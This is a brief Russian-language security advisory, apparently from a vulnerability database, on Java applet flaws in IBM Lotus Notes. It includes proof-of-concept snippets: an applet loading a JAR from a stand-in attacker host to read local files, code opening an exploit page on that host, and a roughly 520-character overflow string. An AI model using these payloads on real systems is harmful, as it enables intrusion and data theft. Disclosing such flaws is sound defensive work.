Программа: IBM Lotus Notes
Уязвимость позволяет удаленному злоумышленнику получить доступ к конфиденциальной информации и выполнить произвольный код на целевой системе.
Уязвимости существуют из-за ошибки в использовании Java апплета. Атакующий может получить доступ к конфиденциальной информации и выполнить произвольный код на целевой системе.
Примеры:
Получение доступа к конфиденциальной информации:
<applet codebase="file:///" archive="http://www.attacker.tld/applet.jar" width="1" height="1"></applet>
Открытие произвольного окна браузера:
public void init() {
getAppletContext().showDocument("http://www.attacker.tld/ie-exploits.html");
}
Переполнение стека:
<applet codebase="A:AAAAAAAAAAAAAAA( repeat 520 A's )AAAAAA" code="java.applet.Applet" width=100 height=100></applet>
